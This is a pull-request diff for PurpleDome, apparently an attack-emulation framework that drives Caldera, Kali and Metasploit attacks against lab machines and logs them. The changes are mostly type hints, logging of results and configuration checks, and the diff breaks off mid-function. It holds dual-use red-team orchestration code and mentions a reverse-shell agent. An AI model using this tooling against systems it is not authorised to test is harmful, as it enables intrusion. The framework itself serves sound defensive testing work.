Merge pull request #12 from avast/more_tests

More tests
pull/17/head
Thorsten Sick 3 years ago committed by GitHub
commit 7e240908de
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -19,4 +19,8 @@ pylint:
pylint --rcfile=pylint.rc *.py app/*.py plugins/base/*.py
mypy:
mypy app/
mypy --strict-optional app/
# Fixing mypy file by file
stepbystep:
mypy --strict-optional plugins/base/plugin_base.py plugins/base/machinery.py app/config.py plugins/base/caldera.py plugins/base/attack.py plugins/base/sensor.py plugins/base/ssh_features.py plugins/base/vulnerability_plugin.py app/attack_log.py app/calderacontrol.py

@ -5,9 +5,10 @@
import json
import datetime
from random import randint
from typing import Optional
def __mitre_fix_ttp__(ttp):
def __mitre_fix_ttp__(ttp: Optional[str]) -> str:
""" enforce some systematic naming scheme for MITRE TTPs """
if ttp is None:
@ -22,12 +23,13 @@ def __mitre_fix_ttp__(ttp):
class AttackLog():
""" A specific logger class to log the progress of the attack steps """
def __init__(self, verbosity=0):
def __init__(self, verbosity: int = 0):
"""
@param verbosity: verbosity setting from 0 to 3 for stdout printing
"""
self.log = []
self.log: list[dict] = []
self.machines: dict = []
self.verbosity = verbosity
# TODO. As soon as someone wants custom timestamps, make the format variable
@ -41,12 +43,12 @@ class AttackLog():
self.log.append(item)
def __get_timestamp__(self):
def __get_timestamp__(self) -> str:
""" Get the timestamp to add to the log entries. Currently not configurable """
return datetime.datetime.now().strftime(self.datetime_format)
def get_caldera_default_name(self, ability_id):
def get_caldera_default_name(self, ability_id: str):
""" Returns the default name for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "whoami"}
if ability_id not in data:
@ -54,7 +56,7 @@ class AttackLog():
return data[ability_id]
def get_caldera_default_description(self, ability_id):
def get_caldera_default_description(self, ability_id: str):
""" Returns the default description for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "Obtain user from current session"}
@ -63,16 +65,16 @@ class AttackLog():
return data[ability_id]
def get_caldera_default_tactics(self, ability_id):
def get_caldera_default_tactics(self, ability_id: str):
""" Returns the default tactics for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": " System Owner/User Discovery"}
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "System Owner/User Discovery"}
if ability_id not in data:
return None
return data[ability_id]
def get_caldera_default_tactics_id(self, ability_id):
def get_caldera_default_tactics_id(self, ability_id: str):
""" Returns the default name for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "T1033"}
@ -81,7 +83,7 @@ class AttackLog():
return data[ability_id]
def get_caldera_default_situation_description(self, ability_id):
def get_caldera_default_situation_description(self, ability_id: str):
""" Returns the default situation description for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": None}
@ -90,7 +92,7 @@ class AttackLog():
return data[ability_id]
def get_caldera_default_countermeasure(self, ability_id):
def get_caldera_default_countermeasure(self, ability_id: str):
""" Returns the default countermeasure for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": None}
@ -99,7 +101,7 @@ class AttackLog():
return data[ability_id]
def start_caldera_attack(self, source, paw, group, ability_id, ttp=None, **kwargs):
def start_caldera_attack(self, source: str, paw: str, group: str, ability_id: str, ttp: str = None, **kwargs):
""" Mark the start of a caldera attack
@param source: source of the attack. Attack IP
@ -131,6 +133,7 @@ class AttackLog():
"countermeasure": kwargs.get("countermeasure", self.get_caldera_default_countermeasure(ability_id)), # Set by the attack
"obfuscator": kwargs.get("obfuscator", "default"),
"jitter": kwargs.get("jitter", "default"),
"result": None,
}
self.__add_to_log__(data)
@ -141,7 +144,7 @@ class AttackLog():
# TODO: Add config
# TODO: Add results
def stop_caldera_attack(self, source, paw, group, ability_id, ttp=None, **kwargs):
def stop_caldera_attack(self, source: str, paw: str, group: str, ability_id: str, ttp: str = None, **kwargs):
""" Mark the end of a caldera attack
@param source: source of the attack. Attack IP
@ -168,11 +171,12 @@ class AttackLog():
"description": kwargs.get("description", ""),
"obfuscator": kwargs.get("obfuscator", "default"),
"jitter": kwargs.get("jitter", "default"),
"logid": kwargs.get("logid", None)
"logid": kwargs.get("logid", None),
"result": kwargs.get("result", None),
}
self.__add_to_log__(data)
def start_file_write(self, source, target, file_name):
def start_file_write(self, source: str, target: str, file_name: str):
""" Mark the start of a file being written to the target (payload !)
@param source: source of the attack. Attack IP (empty if written from controller)
@ -196,7 +200,7 @@ class AttackLog():
self.__add_to_log__(data)
return logid
def stop_file_write(self, source, target, file_name, **kwargs):
def stop_file_write(self, source: str, target: str, file_name: str, **kwargs):
""" Mark the stop of a file being written to the target (payload !)
@param source: source of the attack. Attack IP (empty if written from controller)
@ -220,12 +224,12 @@ class AttackLog():
self.__add_to_log__(data)
def start_execute_payload(self, source, target, command):
def start_execute_payload(self, source: str, target: str, command: str):
""" Mark the start of a payload being executed
@param source: source of the attack. Attack IP (empty if written from controller)
@param target: Target machine of the attack
@param command: Name of the file being written
@param command:
"""
timestamp = self.__get_timestamp__()
@ -245,7 +249,7 @@ class AttackLog():
return logid
def stop_execute_payload(self, source, target, command, **kwargs):
def stop_execute_payload(self, source: str, target: str, command: str, **kwargs):
""" Mark the stop of a payload being executed
@param source: source of the attack. Attack IP (empty if written from controller)
@ -266,7 +270,7 @@ class AttackLog():
}
self.__add_to_log__(data)
def start_kali_attack(self, source, target, attack_name, ttp=None, **kwargs):
def start_kali_attack(self, source: str, target: str, attack_name: str, ttp: str = None, **kwargs):
""" Mark the start of a Kali based attack
@param source: source of the attack. Attack IP
@ -295,6 +299,7 @@ class AttackLog():
"description": kwargs.get("description", None), # Generic description for this attack. Set by the attack
"situation_description": kwargs.get("situation_description", None), # Description for the situation this attack was run in. Set by the plugin or attacker emulation
"countermeasure": kwargs.get("countermeasure", None), # Set by the attack
"result": None,
}
self.__add_to_log__(data)
@ -304,7 +309,7 @@ class AttackLog():
# TODO: Add config
# TODO: Add results
def stop_kali_attack(self, source, target, attack_name, ttp=None, **kwargs):
def stop_kali_attack(self, source: str, target: str, attack_name: str, ttp: str = None, **kwargs):
""" Mark the end of a Kali based attack
@param source: source of the attack. Attack IP
@ -321,11 +326,12 @@ class AttackLog():
"target": target,
"kali_name": attack_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
"logid": kwargs.get("logid", None)
"logid": kwargs.get("logid", None),
"result": kwargs.get("result", None),
}
self.__add_to_log__(data)
def start_narration(self, text):
def start_narration(self, text: str):
""" Add some user defined narration. Can be used in plugins to describe the situation before and after the attack, ...
At the moment there is no stop narration command. I do not think we need one. But I want to stick to the structure
@ -344,6 +350,42 @@ class AttackLog():
self.__add_to_log__(data)
return logid
def start_attack_step(self, text: str):
""" Mark the start of an attack step (several attacks in a chunk)
@param text: description of the attack step being started
"""
timestamp = self.__get_timestamp__()
logid = timestamp + "_" + str(randint(1, 100000))
data = {"timestamp": timestamp,
"timestamp_end": None,
"event": "start",
"type": "attack_step",
"sub_type": "user defined attack step",
"text": text,
"logid": logid,
}
self.__add_to_log__(data)
return logid
def stop_attack_step(self, text: str, **kwargs):
""" Mark the end of an attack step (several attacks in a chunk)
@param text: description of the attack step being stopped
"""
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "attack_step",
"sub_type": "user defined attack step",
"text": text,
"logid": kwargs.get("logid", None)
}
self.__add_to_log__(data)
def start_build(self, **kwargs):
""" Mark the start of a tool building/compilation process
@ -401,7 +443,7 @@ class AttackLog():
}
self.__add_to_log__(data)
def start_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs):
def start_metasploit_attack(self, source: str, target: str, metasploit_command: str, ttp: str = None, **kwargs):
""" Mark the start of a Metasploit based attack
@param source: source of the attack. Attack IP
@ -429,12 +471,13 @@ class AttackLog():
"description": kwargs.get("description", None), # Generic description for this attack. Set by the attack
"situation_description": kwargs.get("situation_description", None), # Description for the situation this attack was run in. Set by the plugin or attacker emulation
"countermeasure": kwargs.get("countermeasure", None), # Set by the attack
"result": None
}
self.__add_to_log__(data)
return logid
def stop_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs):
def stop_metasploit_attack(self, source: str, target: str, metasploit_command: str, ttp: str = None, **kwargs):
""" Mark the start of a Metasploit based attack
@param source: source of the attack. Attack IP
@ -451,11 +494,12 @@ class AttackLog():
"target": target,
"metasploit_command": metasploit_command,
"hunting_tag": __mitre_fix_ttp__(ttp),
"logid": kwargs.get("logid", None)
"logid": kwargs.get("logid", None),
"result": kwargs.get("result", None)
}
self.__add_to_log__(data)
def start_attack_plugin(self, source, target, plugin_name, ttp=None):
def start_attack_plugin(self, source: str, target: str, plugin_name: str, ttp: str = None):
""" Mark the start of an attack plugin
@param source: source of the attack. Attack IP
@ -485,7 +529,7 @@ class AttackLog():
# TODO: Add config
# TODO: Add results
def stop_attack_plugin(self, source, target, plugin_name, **kwargs):
def stop_attack_plugin(self, source: str, target: str, plugin_name: str, **kwargs):
""" Mark the end of an attack plugin
@param source: source of the attack. Attack IP
@ -507,7 +551,7 @@ class AttackLog():
}
self.__add_to_log__(data)
def write_json(self, filename):
def write_json(self, filename: str):
""" Write the json data for this log
@param filename: Name of the json file
@ -526,11 +570,24 @@ class AttackLog():
if replace_entry["event"] == "start" and "logid" in replace_entry and replace_entry["logid"] == logid:
# Found matching start event. Updating it
replace_entry["timestamp_end"] = entry["timestamp"]
if "result" in entry:
replace_entry["result"] = entry["result"]
def get_dict(self):
""" Return logged data in dict format """
return self.log
res = {"boilerplate": {"log_format_major_version": 1, # Changes on changes that breaks readers (items are modified or deleted)
"log_format_minor_version": 1 # Changes even if just new data is added
},
"system_overview": self.machines,
"attack_log": self.log
}
return res
def add_machine_info(self, machine_info):
""" Adds a dict with machine info. One machine per call of this method """
self.machines.append(machine_info)
# TODO: doc_start_environment
@ -540,7 +597,7 @@ class AttackLog():
# TODO: Return full doc
def vprint(self, text, verbosity):
def vprint(self, text: str, verbosity: int):
""" verbosity based stdout printing
0: Errors only

@ -7,6 +7,7 @@ import os
import time
from pprint import pprint, pformat
from typing import Optional
import requests
import simplejson
@ -14,13 +15,15 @@ from app.exceptions import CalderaError
from app.interface_sfx import CommandlineColors
# TODO: Ability deserves an own class.
# TODO: Support all Caldera agents: "Sandcat (GoLang)","Elasticat (Blue Python/ Elasticsearch)","Manx (Reverse Shell TCP)","Ragdoll (Python/HTML)"
class CalderaControl():
""" Remote control Caldera through REST api """
def __init__(self, server, attack_logger, config=None, apikey=None):
def __init__(self, server: str, attack_logger, config=None, apikey=None):
"""
@param server: Caldera server url/ip
@ -38,7 +41,7 @@ class CalderaControl():
else:
self.apikey = apikey
def fetch_client(self, platform="windows", file="sandcat.go", target_dir=".", extension=""):
def fetch_client(self, platform: str = "windows", file: str = "sandcat.go", target_dir: str = ".", extension: str = ""):
""" Downloads the appropriate Caldera client
@param platform: Platform to download the agent for
@ -56,7 +59,7 @@ class CalderaControl():
# print(r.headers)
return filename
def __contact_server__(self, payload, rest_path="api/rest", method="post"):
def __contact_server__(self, payload, rest_path: str = "api/rest", method: str = "post"):
"""
@param payload: payload as dict to send to the server
@ -78,7 +81,7 @@ class CalderaControl():
raise ValueError
try:
res = request.json()
except simplejson.errors.JSONDecodeError as exception:
except simplejson.errors.JSONDecodeError as exception: # type: ignore
print("!!! Error !!!!")
print(payload)
print(request.text)
@ -88,7 +91,7 @@ class CalderaControl():
return res
# ############## List
def list_links(self, opid):
def list_links(self, opid: str):
""" List links associated with an operation
@param opid: operation id to list links for
@ -98,7 +101,7 @@ class CalderaControl():
"op_id": opid}
return self.__contact_server__(payload)
def list_results(self, linkid):
def list_results(self, linkid: str):
""" List results for a link
@param linkid: ID of the link
@ -143,7 +146,7 @@ class CalderaControl():
facts = self.__contact_server__(payload)
return facts
def list_sources_for_name(self, name):
def list_sources_for_name(self, name: str):
""" List facts in a source pool with a specific name """
for i in self.list_sources():
@ -151,7 +154,7 @@ class CalderaControl():
return i
return None
def list_facts_for_name(self, name):
def list_facts_for_name(self, name: str):
""" Pretty format for facts
@param name: Name of the source ot look into
@ -188,7 +191,7 @@ class CalderaControl():
# ######### Get one specific item
def get_operation(self, name):
def get_operation(self, name: str):
""" Gets an operation by name
@param name: Name of the operation to look for
@ -199,7 +202,7 @@ class CalderaControl():
return operation
return None
def get_adversary(self, name):
def get_adversary(self, name: str):
""" Gets a specific adversary by name
@param name: Name to look for
@ -209,7 +212,7 @@ class CalderaControl():
return adversary
return None
def get_objective(self, name):
def get_objective(self, name: str):
""" Returns an objective with a given name
@param name: Name to filter for
@ -221,7 +224,7 @@ class CalderaControl():
# ######### Get by id
def get_source(self, source_name):
def get_source(self, source_name: str):
""" Retrieves data source and detailed facts
@param: The name of the source
@ -231,7 +234,7 @@ class CalderaControl():
"name": source_name}
return self.__contact_server__(payload)
def get_ability(self, abid):
def get_ability(self, abid: str):
"""" Return an ability by id
@param abid: Ability id
@ -258,7 +261,7 @@ class CalderaControl():
return True
return False
def get_operation_by_id(self, op_id):
def get_operation_by_id(self, op_id: str):
""" Get operation by id
@param op_id: Operation id
@ -267,7 +270,7 @@ class CalderaControl():
"id": op_id}
return self.__contact_server__(payload)
def get_result_by_id(self, linkid):
def get_result_by_id(self, linkid: str):
""" Get the result from a link id
@param linkid: link id
@ -276,7 +279,7 @@ class CalderaControl():
"link_id": linkid}
return self.__contact_server__(payload)
def get_linkid(self, op_id, paw, ability_id):
def get_linkid(self, op_id: str, paw: str, ability_id: str):
""" Get the id of a link identified by paw and ability_id
@param op_id: Operation id
@ -296,7 +299,7 @@ class CalderaControl():
# ######### View
def view_operation_report(self, opid):
def view_operation_report(self, opid: str):
""" views the operation report
@param opid: Operation id to look for
@ -310,7 +313,7 @@ class CalderaControl():
}
return self.__contact_server__(payload)
def view_operation_output(self, opid, paw, ability_id):
def view_operation_output(self, opid: str, paw: str, ability_id: str):
""" Gets the output of an executed ability
@param opid: Id of the operation to look for
@ -336,7 +339,7 @@ class CalderaControl():
# ######### Add
def add_sources(self, name, parameters):
def add_sources(self, name: str, parameters):
""" Adds a data source and seeds it with facts """
payload = {"index": "sources",
@ -350,12 +353,14 @@ class CalderaControl():
if parameters is not None:
for key, value in parameters.items():
facts.append({"trait": key, "value": value})
payload["facts"] = facts
# TODO: We need something better than a dict here as payload to have strong typing
payload["facts"] = facts # type: ignore
print(payload)
return self.__contact_server__(payload, method="put")
def add_operation(self, name, advid, group="red", state="running", obfuscator="plain-text", jitter='4/8', parameters=None):
def add_operation(self, name: str, advid: str, group: str = "red", state: str = "running", obfuscator: str = "plain-text", jitter: str = '4/8', parameters=None):
""" Adds a new operation
@param name: Name of the operation
@ -393,7 +398,7 @@ class CalderaControl():
return self.__contact_server__(payload, method="put")
def add_adversary(self, name, ability, description="created automatically"):
def add_adversary(self, name: str, ability: str, description: str = "created automatically"):
""" Adds a new adversary
@param name: Name of the adversary
@ -421,7 +426,7 @@ class CalderaControl():
# TODO View the abilities a given agent could execute. curl -H "key:$API_KEY" -X POST localhost:8888/plugin/access/abilities -d '{"paw":"$PAW"}'
def execute_ability(self, paw, ability_id, obfuscator="plain-text", parameters=None):
def execute_ability(self, paw: str, ability_id: str, obfuscator: str = "plain-text", parameters=None):
""" Executes an ability on a target. This happens outside of the scop of an operation. You will get no result of the ability back
@param paw: Paw of the target
@ -441,13 +446,15 @@ class CalderaControl():
if parameters is not None:
for key, value in parameters.items():
facts.append({"trait": key, "value": value})
payload["facts"] = facts
print(payload)
# TODO. We need something better than a dict here for strong typing
payload["facts"] = facts # type: ignore
# print(payload)
return self.__contact_server__(payload, rest_path="plugin/access/exploit_ex")
def execute_operation(self, operation_id, state="running"):
def execute_operation(self, operation_id: str, state: str = "running"):
""" Executes an operation on a server
@param operation_id: The operation to modify
@ -468,7 +475,7 @@ class CalderaControl():
# ######### Delete
# curl -X DELETE http://localhost:8888/api/rest -d '{"index":"operations","id":"$operation_id"}'
def delete_operation(self, opid):
def delete_operation(self, opid: str):
""" Delete operation by id
@param opid: Operation id
@ -477,7 +484,7 @@ class CalderaControl():
"id": opid}
return self.__contact_server__(payload, method="delete")
def delete_adversary(self, adid):
def delete_adversary(self, adid: str):
""" Delete adversary by id
@param adid: Adversary id
@ -486,7 +493,7 @@ class CalderaControl():
"adversary_id": [{"adversary_id": adid}]}
return self.__contact_server__(payload, method="delete")
def delete_agent(self, paw):
def delete_agent(self, paw: str):
""" Delete a specific agent from the kali db. implant may still be running and reconnect
@param paw: The Id of the agent to delete
@ -495,7 +502,7 @@ class CalderaControl():
"paw": paw}
return self.__contact_server__(payload, method="delete")
def kill_agent(self, paw):
def kill_agent(self, paw: str):
""" Send a message to an agent to kill itself
@param paw: The Id of the agent to delete
@ -529,7 +536,7 @@ class CalderaControl():
# Link, chain and stuff
def is_operation_finished(self, opid, debug=False):
def is_operation_finished(self, opid: str, debug: bool = False):
""" Checks if an operation finished - finished is not necessary successful !
@param opid: Operation id to check
@ -559,7 +566,7 @@ class CalderaControl():
return False
def is_operation_finished_multi(self, opid):
def is_operation_finished_multi(self, opid: str):
""" Checks if an operation finished - finished is not necessary successful ! On several targets.
All links (~ abilities) on all targets must have the status 0 for this to be True.
@ -589,7 +596,8 @@ class CalderaControl():
# ######## All inclusive methods
def attack(self, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters=None, **kwargs):
def attack(self, paw: str = "kickme", ability_id: str = "bd527b63-9f9e-46e0-9816-b8434d2b8989",
group: str = "red", target_platform: Optional[str] = None, parameters: Optional[str] = None, **kwargs):
""" Attacks a system and returns results
@param paw: Paw to attack
@ -625,17 +633,17 @@ class CalderaControl():
self.add_adversary(adversary_name, ability_id)
adid = self.get_adversary(adversary_name)["adversary_id"]
self.attack_logger.start_caldera_attack(source=self.url,
paw=paw,
group=group,
ability_id=ability_id,
ttp=self.get_ability(ability_id)[0]["technique_id"],
name=self.get_ability(ability_id)[0]["name"],
description=self.get_ability(ability_id)[0]["description"],
obfuscator=obfuscator,
jitter=jitter,
**kwargs
)
logid = self.attack_logger.start_caldera_attack(source=self.url,
paw=paw,
group=group,
ability_id=ability_id,
ttp=self.get_ability(ability_id)[0]["technique_id"],
name=self.get_ability(ability_id)[0]["name"],
description=self.get_ability(ability_id)[0]["description"],
obfuscator=obfuscator,
jitter=jitter,
**kwargs
)
# ##### Create / Run Operation
@ -682,9 +690,11 @@ class CalderaControl():
except CalderaError:
pass
outp = ""
if output is None:
output = str(self.get_operation_by_id(opid))
self.attack_logger.vprint(f"{CommandlineColors.FAIL}Failed getting operation data. We just have: {output} from get_operation_by_id{CommandlineColors.ENDC}", 0)
outp = str(self.get_operation_by_id(opid))
self.attack_logger.vprint(f"{CommandlineColors.FAIL}Failed getting operation data. We just have: {outp} from get_operation_by_id{CommandlineColors.ENDC}", 0)
else:
outp = str(output)
self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_GREEN} Output: {outp} {CommandlineColors.ENDC}", 2)
@ -704,7 +714,9 @@ class CalderaControl():
name=self.get_ability(ability_id)[0]["name"],
description=self.get_ability(ability_id)[0]["description"],
obfuscator=obfuscator,
jitter=jitter
jitter=jitter,
logid=logid,
result=[outp]
)
return True

@ -2,6 +2,7 @@
""" Configuration loader for PurpleDome """
from typing import Optional
import yaml
from app.exceptions import ConfigurationError
@ -17,7 +18,7 @@ from app.exceptions import ConfigurationError
class MachineConfig():
""" Sub config for a specific machine"""
def __init__(self, machinedata):
def __init__(self, machinedata: dict):
""" Init machine control config
@param machinedata: dict containing machine data
@ -44,12 +45,12 @@ class MachineConfig():
if vmcontroller not in ["vagrant", "running_vm"]:
raise ConfigurationError
def vmname(self):
def vmname(self) -> str:
""" Returns the vmname """
return self.raw_config["vm_name"]
def get_nicknames(self):
def get_nicknames(self) -> list[str]:
""" Gets the nicknames """
if "nicknames" in self.raw_config:
@ -57,88 +58,88 @@ class MachineConfig():
return []
def vmcontroller(self):
def vmcontroller(self) -> str:
""" Returns the vm controller. lowercase """
return self.raw_config["vm_controller"]["type"].lower()
def vm_ip(self):
def vm_ip(self) -> str:
""" Return the configured ip/domain name (whatever is needed to reach the machine). Returns None if missing """
try:
return self.raw_config["vm_controller"]["ip"]
except KeyError:
return self.vmname()
def os(self): # pylint: disable=invalid-name
def os(self) -> str: # pylint: disable=invalid-name
""" returns the os. lowercase """
return self.raw_config["os"].lower()
def use_existing_machine(self):
def use_existing_machine(self) -> bool:
""" Returns if we want to use the existing machine """
return self.raw_config.get("use_existing_machine", False)
def machinepath(self):
def machinepath(self) -> str:
""" Returns the machine path. If not configured it will fall back to the vm_name """
return self.raw_config.get("machinepath", self.vmname())
def get_playground(self):
def get_playground(self) -> Optional[str]:
""" Returns the machine specific playground where all the implants and tools will be installed """
return self.raw_config.get("playground", None)
def caldera_paw(self):
def caldera_paw(self) -> Optional[str]:
""" Returns the paw (caldera id) of the machine """
return self.raw_config.get("paw", None)
def caldera_group(self):
def caldera_group(self) -> Optional[str]:
""" Returns the group (caldera group id) of the machine """
return self.raw_config.get("group", None)
def ssh_keyfile(self):
def ssh_keyfile(self) -> Optional[str]:
""" Returns the configured SSH keyfile """
return self.raw_config.get("ssh_keyfile", None)
def ssh_user(self):
def ssh_user(self) -> str:
""" Returns configured ssh user or "vagrant" as default """
return self.raw_config.get("ssh_user", "vagrant")
def ssh_password(self):
def ssh_password(self) -> Optional[str]:
""" Returns configured ssh password or None as default """
return self.raw_config.get("ssh_password", None)
def halt_needs_force(self):
def halt_needs_force(self) -> bool:
""" Returns if halting the machine needs force False as default """
return self.raw_config.get("halt_needs_force", False)
def vagrantfilepath(self):
def vagrantfilepath(self) -> str:
""" Vagrant specific config: The vagrant file path """
if "vagrantfilepath" not in self.raw_config["vm_controller"]:
raise ConfigurationError("Vagrantfilepath missing")
return self.raw_config["vm_controller"]["vagrantfilepath"]
def sensors(self):
def sensors(self) -> list[str]:
""" Return a list of sensors configured for this machine """
if "sensors" in self.raw_config:
return self.raw_config["sensors"] or []
return []
def vulnerabilities(self):
def vulnerabilities(self) -> list[str]:
""" Return a list of vulnerabilities configured for this machine """
if "vulnerabilities" in self.raw_config:
return self.raw_config["vulnerabilities"] or []
return []
def is_active(self):
def is_active(self) -> bool:
""" Returns if this machine is set to active. Default is true """
return self.raw_config.get("active", True)
@ -147,21 +148,21 @@ class MachineConfig():
class ExperimentConfig():
""" Configuration class for a whole experiments """
def __init__(self, configfile):
def __init__(self, configfile: str):
""" Init the config, process the file
@param configfile: The configuration file to process
"""
self.raw_config = None
self._targets = []
self._attackers = []
self.raw_config: Optional[dict] = None
self._targets: list[MachineConfig] = []
self._attackers: list[MachineConfig] = []
self.load(configfile)
# Test essential data that is a hard requirement. Should throw errors if anything is wrong
self.loot_dir()
def load(self, configfile):
def load(self, configfile: str):
""" Loads the configuration file
@param configfile: The configuration file to process
@ -170,11 +171,18 @@ class ExperimentConfig():
with open(configfile) as fh:
self.raw_config = yaml.safe_load(fh)
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
# Process targets
if self.raw_config["targets"] is None:
raise ConfigurationError("Config file does not specify targets")
for target in self.raw_config["targets"]:
self._targets.append(MachineConfig(self.raw_config["targets"][target]))
# Process attackers
if self.raw_config["attackers"] is None:
raise ConfigurationError("Config file does not specify attackers")
for attacker in self.raw_config["attackers"]:
self._attackers.append(MachineConfig(self.raw_config["attackers"][attacker]))
@ -188,7 +196,7 @@ class ExperimentConfig():
return self._attackers
def attacker(self, mid) -> MachineConfig:
def attacker(self, mid: int) -> MachineConfig:
""" Return config for attacker as MachineConfig objects
@param mid: id of the attacker, 0 is main attacker
@ -196,14 +204,20 @@ class ExperimentConfig():
return self.attackers()[mid]
def caldera_apikey(self):
def caldera_apikey(self) -> str:
""" Returns the caldera apikey """
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
return self.raw_config["caldera"]["apikey"]
def loot_dir(self):
def loot_dir(self) -> str:
""" Returns the loot dir """
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "results" not in self.raw_config or self.raw_config["results"] is None:
raise ConfigurationError("results missing in configuration")
try:
@ -212,12 +226,16 @@ class ExperimentConfig():
raise ConfigurationError("results/loot_dir not properly set in configuration") from error
return res
def attack_conf(self, attack):
def attack_conf(self, attack: str) -> dict:
""" Get kali config for a specific kali attack
@param attack: Name of the attack to look up config for
"""
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if self.raw_config["attack_conf"] is None:
raise ConfigurationError("Config file missing attacks")
try:
res = self.raw_config["attack_conf"][attack]
except KeyError:
@ -227,30 +245,39 @@ class ExperimentConfig():
return res
def get_caldera_obfuscator(self):
def get_caldera_obfuscator(self) -> str:
""" Get the caldera configuration. In this case: The obfuscator. Will default to plain-text """
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
try:
res = self.raw_config["caldera_conf"]["obfuscator"]
except KeyError:
return "plain-text"
return res
def get_caldera_jitter(self):
def get_caldera_jitter(self) -> str:
""" Get the caldera configuration. In this case: Jitter. Will default to 4/8 """
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
try:
res = self.raw_config["caldera_conf"]["jitter"]
except KeyError:
return "4/8"
return res
def get_plugin_based_attacks(self, for_os):
def get_plugin_based_attacks(self, for_os: str) -> list[str]:
""" Get the configured kali attacks to run for a specific OS
@param for_os: The os to query the registered attacks for
"""
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "plugin_based_attacks" not in self.raw_config:
return []
if for_os not in self.raw_config["plugin_based_attacks"]:
@ -260,12 +287,15 @@ class ExperimentConfig():
return []
return res
def get_caldera_attacks(self, for_os):
def get_caldera_attacks(self, for_os: str) -> list:
""" Get the configured caldera attacks to run for a specific OS
@param for_os: The os to query the registered attacks for
"""
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "caldera_attacks" not in self.raw_config:
return []
if for_os not in self.raw_config["caldera_attacks"]:
@ -275,19 +305,26 @@ class ExperimentConfig():
return []
return res
def get_nap_time(self):
def get_nap_time(self) -> int:
""" Returns the attackers nap time between attack steps """
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
try:
return self.raw_config["attacks"]["nap_time"]
return int(self.raw_config["attacks"]["nap_time"])
except KeyError:
return 0
def get_sensor_config(self, name):
def get_sensor_config(self, name: str) -> dict:
""" Return the config for a specific sensor
@param name: name of the sensor
"""
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "sensors" not in self.raw_config:
return {}
if self.raw_config["sensors"] is None: # Better for unit tests that way.

@ -0,0 +1,45 @@
#!/usr/bin/env python3
""" Generate human readable document describing the attack based on an attack log """
import json
import os
from jinja2 import Environment, FileSystemLoader, select_autoescape
class DocGenerator():
""" Generates human readable docs from attack logs """
def __init__(self):
self.outfile = None
def generate(self, jfile, outfile="tools/human_readable_documentation/source/contents.rst"):
self.outfile = outfile
env = Environment(
loader=FileSystemLoader("templates", encoding='utf-8', followlinks=False),
autoescape=select_autoescape(),
trim_blocks=True,
# lstrip_blocks=True
)
template = env.get_template("attack_description.rst")
with open(jfile) as fh:
attack = json.load(fh)
rendered = template.render(events=attack["attack_log"], systems=attack["system_overview"], boilerplate=attack["boilerplate"])
print(rendered)
with open(outfile, "wt") as fh:
fh.write(rendered)
def compile_documentation(self):
""" Compiles the documentation using make """
os.system("cd tools/human_readable_documentation ; make html; make latexpdf ")
def get_outfile_paths(self):
""" Returns the path of the output file written """
return ["tools/human_readable_documentation/build/latex/purpledomesimulation.pdf"]

@ -24,3 +24,7 @@ class NetworkError(Exception):
class MetasploitError(Exception):
""" Metasploit had an error """
class RequirementError(Exception):
""" Plugin requirements not fulfilled """

@ -6,6 +6,7 @@ import os
import subprocess
import time
import zipfile
import shutil
from datetime import datetime
from app.attack_log import AttackLog
@ -13,6 +14,7 @@ from app.config import ExperimentConfig
from app.interface_sfx import CommandlineColors
from app.exceptions import ServerError
from app.pluginmanager import PluginManager
from app.doc_generator import DocGenerator
from caldera_control import CalderaControl
from machine_control import Machine
from plugins.base.attack import AttackPlugin
@ -65,11 +67,14 @@ class Experiment():
except subprocess.CalledProcessError:
# Maybe the machine just does not exist yet
pass
target_1.install_caldera_service()
if self.machine_needs_caldera(target_1, caldera_attacks):
target_1.install_caldera_service()
target_1.up()
needs_reboot = target_1.prime_vulnerabilities()
needs_reboot |= target_1.prime_sensors()
if needs_reboot:
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}rebooting target {tname} ....{CommandlineColors.ENDC}", 1)
target_1.reboot()
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Target is up: {tname} {CommandlineColors.ENDC}", 1)
self.targets.append(target_1)
@ -87,10 +92,16 @@ class Experiment():
a_target.start_sensors()
# First start of caldera implants
at_least_one_caldera_started = False
for target_1 in self.targets:
target_1.start_caldera_client()
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1)
time.sleep(20) # Wait for all the clients to contact the caldera server
if self.machine_needs_caldera(target_1, caldera_attacks):
target_1.start_caldera_client()
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1)
else:
at_least_one_caldera_started = True
if at_least_one_caldera_started:
time.sleep(20) # Wait for all the clients to contact the caldera server
# TODO: Smarter wait
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Contacting caldera agents on all targets ....{CommandlineColors.ENDC}", 1)
# Wait until all targets are registered as Caldera targets
@ -98,22 +109,37 @@ class Experiment():
running_agents = self.caldera_control.list_paws_of_running_agents()
self.attack_logger.vprint(f"Agents currently running: {running_agents}", 2)
while target_1.get_paw() not in running_agents:
if self.machine_needs_caldera(target_1, caldera_attacks) == 0:
